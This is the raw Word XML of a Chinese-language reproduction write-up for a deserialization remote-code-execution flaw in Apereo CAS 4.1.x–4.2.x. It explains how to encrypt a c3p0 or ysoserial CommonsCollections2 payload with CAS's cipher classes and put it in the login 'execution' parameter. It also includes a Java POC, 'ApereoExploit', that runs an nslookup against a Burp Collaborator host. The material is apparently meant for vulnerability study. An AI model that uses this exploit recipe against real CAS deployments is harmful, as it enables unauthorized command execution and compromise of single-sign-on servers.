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02" w:rsidRDefault="00647902" w:rsidP="0064790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47902">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:t>Apereo CAS 4.1.7 ～ 4.2.X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RCE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复现</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00647902" w:rsidRDefault="00647902" w:rsidP="00647902">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参考于：</w:t>
      </w:r>
      <w:hyperlink r:id="rId7" w:history="1">
        <w:r w:rsidRPr="00AD5EE7">
          <w:rPr>
            <w:rStyle w:val="a7"/>
          </w:rPr>
          <w:t>https://xz.aliyun.com/t/7032</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00163DDF" w:rsidRDefault="00163DDF" w:rsidP="00163DDF">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>环境准备</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00163DDF" w:rsidRPr="00163DDF" w:rsidRDefault="00163DDF" w:rsidP="00163DDF">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这里使用和原文一样的版本，这样代码好找点。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00163DDF" w:rsidRDefault="009C7594" w:rsidP="00163DDF">
      <w:hyperlink r:id="rId8" w:history="1">
        <w:r w:rsidR="00163DDF" w:rsidRPr="00AD5EE7">
          <w:rPr>
            <w:rStyle w:val="a7"/>
          </w:rPr>
          <w:t>https://repo1.maven.org/maven2/org/jasig/cas/cas-server-webapp/4.2.7/cas-server-webapp-4.2.7.war</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00163DDF" w:rsidRDefault="005C6BF7" w:rsidP="00163DDF">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ec</w:t>
      </w:r>
      <w:r>
        <w:t>lipse :</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>能跑代码就行</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005C6BF7" w:rsidRDefault="005C6BF7" w:rsidP="00163DDF">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>v</w:t>
      </w:r>
      <w:r>
        <w:t>ps</w:t>
      </w:r>
      <w:r w:rsidR="005E7800">
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>一台能被远程加载访问就行</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005C6BF7" w:rsidRDefault="005E7800" w:rsidP="00163DDF">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>t</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">omcat : </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>一只</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005E7800" w:rsidRDefault="005E7800" w:rsidP="005E7800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5E7800" w:rsidRDefault="00DF0961" w:rsidP="005E7800">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>首先通过原文的仔细阅读，才最终可以复现这个漏洞，最后我没去搞清楚K</w:t>
      </w:r>
      <w:r>
        <w:t>EY</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如何生成。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DF0961" w:rsidRDefault="00DF0961" w:rsidP="005E7800">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>但是通过原文和自己复现的理解。我们要达到R</w:t>
      </w:r>
      <w:r>
        <w:t>CE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 还是要知道K</w:t>
      </w:r>
      <w:r>
        <w:t>EY</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DF0961" w:rsidRDefault="00DF0961" w:rsidP="005E7800"/>
    <w:p w:rsidR="00806B40" w:rsidRDefault="00806B40" w:rsidP="005E7800">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>首先我把我的w</w:t>
      </w:r>
      <w:r>
        <w:t>ar</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>包放置到我们的</w:t>
      </w:r>
      <w:r>
        <w:t>webapps</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>下。然后</w:t>
      </w:r>
      <w:r w:rsidR="00E664DE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和原文一样去修改我们的密钥。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E664DE" w:rsidRDefault="00E664DE" w:rsidP="005E7800">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>把我们的w</w:t>
      </w:r>
      <w:r>
        <w:t>ar</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>包改成z</w:t>
      </w:r>
      <w:r>
        <w:t>ip</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>格式，然后直接打开编辑</w:t>
      </w:r>
      <w:r w:rsidRPr="00E664DE">
        <w:t>WEB-INF</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>\</w:t>
      </w:r>
      <w:r w:rsidRPr="00E664DE">
        <w:t>cas.properties</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E664DE" w:rsidRDefault="00E664DE" w:rsidP="005E7800">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>编辑这两个参数为我们知道的k</w:t>
      </w:r>
      <w:r>
        <w:t>ey</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>然后保存下来</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E664DE" w:rsidRDefault="00E664DE" w:rsidP="005E7800">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="66F97FC5" wp14:editId="2F51556C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DE" w:rsidRDefault="00AD6115" w:rsidP="005E7800">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>还有下面的两个参数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AD6115" w:rsidRDefault="00AD6115" w:rsidP="005E7800">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="11627DF6" wp14:editId="19A5C630">
            <wp:extent cx="5274310" cy="19798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678" cy="19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15" w:rsidRDefault="007011E1" w:rsidP="005E7800">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和原本的一样，</w:t>
      </w:r>
      <w:r>
        <w:t>key</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的话可以自己设定。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00465CD3" w:rsidRDefault="00465CD3" w:rsidP="005E7800">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>然后改成w</w:t>
      </w:r>
      <w:r>
        <w:t>ar</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>包。启动我们的猫</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00465CD3" w:rsidRDefault="0082294F" w:rsidP="005E7800">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>访问</w:t>
      </w:r>
      <w:r>
        <w:t>localhost/</w:t>
      </w:r>
      <w:r w:rsidRPr="0082294F">
        <w:t>cas-server-webapp-4.2.</w:t>
      </w:r>
      <w:r>
        <w:t>7</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0082294F" w:rsidRDefault="0082294F" w:rsidP="005E7800">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>就可以访问到我们的界面</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0082294F" w:rsidRDefault="00A829C7" w:rsidP="005E7800">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7E7B08EB" wp14:editId="551B556B">
            <wp:extent cx="5274310" cy="2633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C7" w:rsidRDefault="00A829C7" w:rsidP="005E7800">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>到这里环境就搭建完毕。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00270179" w:rsidRDefault="00A829C7" w:rsidP="00A829C7">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>分析文章编写E</w:t>
      </w:r>
      <w:r>
        <w:t>XP</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D21615" w:rsidRDefault="00D21615" w:rsidP="00A829C7">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>原文说到</w:t>
      </w:r>
      <w:r>
        <w:t>payload，先用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
        </w:rPr>
        <w:t>encode</w:t>
      </w:r>
      <w:r>
        <w:t>加密后再进行一次base64编码。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DF7359" w:rsidRDefault="00D21615" w:rsidP="00A829C7">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>那我们要做的就是把e</w:t>
      </w:r>
      <w:r>
        <w:t>ncode</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>给调试出来。那么这里我们通过原文可以知道</w:t>
      </w:r>
      <w:r>
        <w:t>encode</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数在我们的</w:t>
      </w:r>
      <w:r w:rsidR="00DF7359">
        <w:t>cas-server-core-util.jar!/jasig/cas/util/BinaryCipherExecutor.java</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00952D7A" w:rsidRDefault="00952D7A" w:rsidP="00A829C7">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通过反编译war包我们也学着去找到那个文件。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00952D7A" w:rsidRDefault="00F91C03" w:rsidP="00A829C7">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="17E7E159" wp14:editId="19ABE848">
            <wp:extent cx="5274310" cy="2522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03" w:rsidRDefault="008E509C" w:rsidP="00A829C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可以看到我们的加密方法在我们的类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BinaryCipherExecutor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里</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008E509C" w:rsidRDefault="00A1104F" w:rsidP="00A829C7">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>那么我们要生成我们的加密</w:t>
      </w:r>
      <w:r>
        <w:t>payload</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，那就是要把这个文件的e</w:t>
      </w:r>
      <w:r>
        <w:t>ncode</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>给调出来。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A1104F" w:rsidRDefault="00AD6177" w:rsidP="00A829C7">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>打开我们的e</w:t>
      </w:r>
      <w:r>
        <w:t>clipse</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。然后创建个j</w:t>
      </w:r>
      <w:r>
        <w:t>ava</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>项目</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AD6177" w:rsidRDefault="0049121D" w:rsidP="00A829C7">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>导入我们需要用到他的j</w:t>
      </w:r>
      <w:r>
        <w:t>ar</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>包</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0049121D" w:rsidRDefault="00316AC3" w:rsidP="00A829C7">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6A1E15B5" wp14:editId="7B0F8A16">
            <wp:extent cx="5274310" cy="746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B7" w:rsidRDefault="00B50CB7" w:rsidP="00A829C7">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>然后i</w:t>
      </w:r>
      <w:r>
        <w:t>mport</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>入这个包</w:t>
      </w:r>
      <w:r w:rsidR="008C76D5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，根据源码可以看到我们要声明个对象，然后传两个k</w:t>
      </w:r>
      <w:r w:rsidR="008C76D5">
        <w:t>ey</w:t>
      </w:r>
      <w:r w:rsidR="008C76D5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>给构造方法</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00486A0D" w:rsidRDefault="00E62770" w:rsidP="00A829C7">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>后来i</w:t>
      </w:r>
      <w:r>
        <w:t>mport</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>了个包报错，回去看了下原本的类，关联了很多，然后</w:t>
      </w:r>
      <w:r w:rsidR="000123F6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>干脆直接导入原本l</w:t>
      </w:r>
      <w:r w:rsidR="000123F6">
        <w:t>ib</w:t>
      </w:r>
      <w:r w:rsidR="000123F6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>下的所有的</w:t>
      </w:r>
      <w:r w:rsidR="000123F6">
        <w:t>jar</w:t>
      </w:r>
      <w:r w:rsidR="000123F6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>包。</w:t>
      </w:r>
      <w:r w:rsidR="00FC7EB4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这样</w:t>
      </w:r>
      <w:r w:rsidR="00486A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>就可以跑起来了</w:t>
      </w:r>
      <w:r w:rsidR="008C4164">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00790A07" w:rsidRDefault="00790A07" w:rsidP="00A829C7">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>下图为调试调用了e</w:t>
      </w:r>
      <w:r>
        <w:t>ncode</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方法的</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008E509C" w:rsidRDefault="008C7939" w:rsidP="00A829C7">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5DB3545E" wp14:editId="0F4C84BA">
            <wp:extent cx="5274310" cy="1824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40" w:rsidRDefault="00D170C8" w:rsidP="005E7800">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以看到我们e</w:t>
      </w:r>
      <w:r>
        <w:t>ncode</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>出来了！！！</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D170C8" w:rsidRDefault="00D170C8" w:rsidP="005E7800">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3F5306A0" wp14:editId="55853E91">
            <wp:extent cx="5274310" cy="1359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6" w:rsidRDefault="00A259B6" w:rsidP="005E7800"/>
    <w:p w:rsidR="00A07F81" w:rsidRDefault="00A07F81" w:rsidP="005E7800">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>于是现在就和先知一样。调用c</w:t>
      </w:r>
      <w:r>
        <w:t>3p0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>生成我们的序列化对象</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A07F81" w:rsidRDefault="009B7530" w:rsidP="005E7800">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>然后将序列化对象进行加密即可。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009B7530" w:rsidRDefault="00A078A4" w:rsidP="005E7800">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2D843811" wp14:editId="727FA1C9">
            <wp:extent cx="5274310" cy="2146852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149" cy="21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30" w:rsidRDefault="009B7530" w:rsidP="005E7800"/>
    <w:p w:rsidR="009B7530" w:rsidRDefault="009B7530" w:rsidP="009B753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漏洞复现</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009B7530" w:rsidRDefault="009B7530" w:rsidP="009B7530">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>复制生成我们的p</w:t>
      </w:r>
      <w:r>
        <w:t>ayload</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009B7530" w:rsidRDefault="009B7530" w:rsidP="009B7530">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>然后v</w:t>
      </w:r>
      <w:r>
        <w:t>ps</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>开启服务</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w:rsidR="007E083C" w:rsidRDefault="007E083C" w:rsidP="009B7530">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>然后请求登录抓取R</w:t>
      </w:r>
      <w:r>
        <w:t>AW</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>包。修改我们的</w:t>
      </w:r>
      <w:r w:rsidRPr="007E083C">
        <w:t>execution</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参数为：上面生成的P</w:t>
      </w:r>
      <w:r>
        <w:t>AYLOAD</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007E083C" w:rsidRDefault="007E083C" w:rsidP="009B7530">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>即可执行命令</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007E083C" w:rsidRDefault="007E083C" w:rsidP="009B7530">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="02DEE1D1" wp14:editId="5F76EA2D">
            <wp:extent cx="5274310" cy="2909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3C" w:rsidRDefault="00BA7311" w:rsidP="009B7530">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="58FB651C" wp14:editId="0AF0FA31">
            <wp:extent cx="5274310" cy="831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30" w:rsidRPr="009B7530" w:rsidRDefault="009B7530" w:rsidP="009B7530"/>
    <w:p w:rsidR="00163DDF" w:rsidRPr="00163DDF" w:rsidRDefault="00163DDF" w:rsidP="00163DDF"/>
    <w:p w:rsidR="00A17B1A" w:rsidRDefault="00A17B1A" w:rsidP="00A17B1A">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r>
        <w:t>Apereo CAS 4.1.X ~ 4.1.6</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003E6FE5" w:rsidRDefault="003E6FE5" w:rsidP="003E6FE5">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>该版本和上面复现的版本不一样，上面的版本需要知道K</w:t>
      </w:r>
      <w:r>
        <w:t>EY</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>才可以。这个版本，调用的是默认k</w:t>
      </w:r>
      <w:r>
        <w:t>ey</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。且依赖包有</w:t>
      </w:r>
      <w:r w:rsidRPr="003E6FE5">
        <w:t>commons-collections4-4.0.jar</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>所以复现就及其简单。</w:t>
      </w:r>
      <w:r w:rsidR="009A2251">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>直接替换p</w:t>
      </w:r>
      <w:r w:rsidR="009A2251">
        <w:t>ayload</w:t>
      </w:r>
      <w:r w:rsidR="009A2251">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>无需像C</w:t>
      </w:r>
      <w:r w:rsidR="009A2251">
        <w:t>3P0</w:t>
      </w:r>
      <w:r w:rsidR="009A2251">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>一样需要</w:t>
      </w:r>
      <w:r w:rsidR="009A2251">
        <w:t>VPS</w:t>
      </w:r>
      <w:r w:rsidR="009A2251">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00647902" w:rsidRDefault="00647902" w:rsidP="00647902"/>
    <w:p w:rsidR="00A17B1A" w:rsidRDefault="00A17B1A" w:rsidP="00647902">
      <w:r>
        <w:t>POC</w:t>
      </w:r>
      <w:r w:rsidR="00403CC3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：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org.cryptacular.util.CodecUtil;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org.jasig.spring.webflow.plugin.EncryptedTranscoder;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ysoserial.payloads.ObjectPayload;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ApereoExploit {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"CommonsCollections2"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"nslookup zil1vptnk7keebb2vi8bm7qr4iaby0.burpcollaborator.net"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payloadObject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ObjectPayload.Utils.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makePayloadObject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//AES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加密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EncryptedTranscoder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EncryptedTranscoder();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.encode(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payloadObject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//base64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编码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.println(CodecUtil.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b64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03CC3" w:rsidRDefault="00403CC3" w:rsidP="00403C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03CC3" w:rsidRDefault="00403CC3" w:rsidP="00403CC3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7B1A" w:rsidRDefault="00A17B1A" w:rsidP="00647902"/>
    <w:p w:rsidR="00A17B1A" w:rsidRDefault="00A17B1A" w:rsidP="00A17B1A">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>有了上面一篇复现流程。下面这个有</w:t>
      </w:r>
      <w:r>
        <w:t>POC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的直接同样的调试即可马上得到</w:t>
      </w:r>
      <w:r w:rsidR="00055746">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>pay</w:t>
      </w:r>
      <w:r w:rsidR="00055746">
        <w:t>load</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A17B1A" w:rsidRDefault="00A17B1A" w:rsidP="0064790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A17B1A" w:rsidRDefault="00A17B1A" w:rsidP="00647902">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="48DAD899" wp14:editId="166A5D94">
            <wp:extent cx="5274310" cy="3075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02" w:rsidRPr="00647902" w:rsidRDefault="00A17B1A" w:rsidP="00647902">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2C2B527F" wp14:editId="0591A0F1">
            <wp:extent cx="5274310" cy="34036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02" w:rsidRPr="0064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594" w:rsidRDefault="009C7594" w:rsidP="00647902">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="009C7594" w:rsidRDefault="009C7594" w:rsidP="0064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594" w:rsidRDefault="009C7594" w:rsidP="00647902">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="009C7594" w:rsidRDefault="009C7594" w:rsidP="00647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D77"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="7B68A21A"/>
    <w:lvl w:ilvl="0" w:tplc="0C70899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94"/>
    <w:rsid w:val="00000372"/>
    <w:rsid w:val="000123F6"/>
    <w:rsid w:val="00055746"/>
    <w:rsid w:val="00163DDF"/>
    <w:rsid w:val="001F688E"/>
    <w:rsid w:val="00270179"/>
    <w:rsid w:val="00316AC3"/>
    <w:rsid w:val="003E6FE5"/>
    <w:rsid w:val="00403CC3"/>
    <w:rsid w:val="00424E34"/>
    <w:rsid w:val="0043177B"/>
    <w:rsid w:val="00465CD3"/>
    <w:rsid w:val="004818C9"/>
    <w:rsid w:val="00486A0D"/>
    <w:rsid w:val="0049121D"/>
    <w:rsid w:val="004E108B"/>
    <w:rsid w:val="005414A6"/>
    <w:rsid w:val="00552594"/>
    <w:rsid w:val="005A7517"/>
    <w:rsid w:val="005C6BF7"/>
    <w:rsid w:val="005E402B"/>
    <w:rsid w:val="005E7800"/>
    <w:rsid w:val="00647902"/>
    <w:rsid w:val="006C5739"/>
    <w:rsid w:val="007011E1"/>
    <w:rsid w:val="007613F0"/>
    <w:rsid w:val="00790A07"/>
    <w:rsid w:val="007E083C"/>
    <w:rsid w:val="007F300D"/>
    <w:rsid w:val="00806B40"/>
    <w:rsid w:val="0082294F"/>
